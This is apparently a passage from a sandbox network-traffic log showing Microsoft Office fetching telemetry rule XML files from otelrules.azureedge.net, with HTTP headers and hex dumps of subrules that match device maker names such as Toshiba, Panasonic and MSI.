                                                                                                                                                                                                            2024-11-22 03:27:12 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            48192.168.2.44987713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:12 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                            x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032712Z-178bfbc474bw8bwphC1NYC38b4000000025000000000kwxv
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            49192.168.2.44987813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:12 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                            x-ms-request-id: 79192ebf-401e-0035-7e68-3b82d8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032712Z-178bfbc474bq2pr7hC1NYCkfgg00000002m0000000005wum
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            50192.168.2.44987913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:13 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                            x-ms-request-id: 242b2616-d01e-0017-014e-3cb035000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032713Z-15b8b599d885v8r9hC1TEB104g00000000u000000000kher
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            51192.168.2.44988013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:12 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:13 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                            x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032713Z-174c587ffdfn4nhwhC1TEB2nbc00000000ug00000000pgxc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:13 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            52192.168.2.44988113.107.246.634438C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:14 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:14 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                            x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032714Z-178bfbc474bpscmfhC1NYCfc2c000000010g000000008emd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            53192.168.2.44988313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:14 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:15 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                            x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032715Z-178bfbc474bbcwv4hC1NYCypys00000002a0000000005a53
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            54192.168.2.44988213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:14 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:15 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                            x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032715Z-178bfbc474bbcwv4hC1NYCypys000000029g000000006k7x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            55192.168.2.44988413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:15 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                            x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032715Z-178bfbc474bxkclvhC1NYC69g400000002c0000000006xyr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            56192.168.2.44988513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:15 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                            x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032715Z-174c587ffdf4zw2thC1TEBu34000000000w000000000gfmd
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:15 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            57192.168.2.44988613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:16 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
